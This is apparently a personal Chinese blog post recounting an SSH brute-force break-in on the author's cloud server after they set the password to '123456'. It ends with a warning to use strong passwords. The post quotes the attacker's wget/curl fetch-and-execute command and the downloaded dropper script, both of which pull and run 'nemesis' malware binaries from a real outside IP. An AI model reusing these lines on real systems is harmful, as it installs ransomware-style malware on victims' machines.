一切事情源于昨天的修改密码……wuwuwu
昨天用VSCode+SSH扩展登录服务器写代码时,嫌弃之前设置的SSH登录密码复杂,所以设置成了“123456”,这个密码用着是真的爽,结果没想到,这是万恶之源。
今天早上一觉睡醒来看见腾讯云助手给我发了一堆消息:
这就是传说中的服务器被人r了???赶紧看看我的网站还正常不???
哈哈,网站还正常,没什么大事,接着睡觉!越睡越睡不着,这人干啥的?为什么要r我服务器?我不就设置个简单的密码吗?这么快就被发现了?
好奇心太强了,登录一下服务器看看发生了什么。
这一登录,卧槽,打开了新世界的大门……
系统提示上一次登录时间是凌晨4点,和被黑客入侵是一致,后面这个ip应该是他的了,看看是哪里的:
咱也不知道他有没有设置代理,暂且当他为保加利亚的吧~
Linux是有历史命令记录的,看看这位保加利亚的老哥暴力破解我的密码,到底干啥了。
他总共执行了三条命令:
cd /tmp cd /dev cd /mnt || cd /var; wget http://66.42.80.43/sh; curl -O http://66.42.80.43/sh; chmod 777 sh; ./sh; rm -rf sh
cd
chmod 777 *
第二条命令没什么卵用,第三条命令是给所有文件加上可执行权限,如图:
好吧,你这是何必呢~
看来第一条命令就是他的目的了,辛辛苦苦暴力破解了,不可能啥都不干就走了,咱来看看这第一条命令是干啥的。
这条命令其实就是把http://66.42.80.43/sh
这个脚本拉取下来,加上可执行权限,执行,最后删除掉这个脚本。
悄悄的来看下这个脚本内容:
binarys="mips mpsl sh4 ppc x86 arc arm7 arm6 arm5 arm"
server_ip="66.42.80.43"
binname="nemesis"
execname="execnemesis"
for arch in $binarys
do
cd /tmp
wget http://$server_ip/$binname.$arch -O $execname
chmod 777 $execname
./$execname $1
rm -rf $execname
done
这段脚本的大致意思还是从那个服务器上,根据当前CPU架构拉取下来一个文件,加上可执行权限,然后删除,事情逐渐有点意思了,咱也拉取一下这个文件,看看是干啥的,哟呵,刚刚拉取到本地,腾讯云助手就给我发消息了:
卧槽,原来这是个病毒,他还真没白来一趟……
看一下病毒的文件类型,x86-64可执行程序:
既然都执行了一次,我们再来执行一下,看看啥效果:
这个病毒只有一行提示:
Nemesis infection success
英语没学好,查查这是啥意思:
卧槽!兄dei!你这是弄啥嘞!怎么就复仇者了???瑟瑟发抖的去百度看下。
我的天!勒索病毒!文件都被加密了???
果然,文件夹全都进不去了,还好,对于我这种到处白嫖服务器的人,服务器上根本没什么东西,博客源码也全都在Github上,没什么影响,这兄弟白费劲了~
不过,文件夹只是提示没有权限,那我切换到roo用户玩玩:
全部能正常打开访问。。。。大兄dei。。。。
服务器已经被他破坏成这样了,给钱是不可能的,只能在腾讯云直接重置系统镜像,也没别的办法了。
在此,提醒广大拥有服务器的小伙伴,看了我的经历:
密码千万别设置太简单!!!
密码千万别设置太简单!!!
密码千万别设置太简单!!!
否则像我这样遭到暴力破解,虽然没啥影响,但是重新部署一下多麻烦呢,是吧?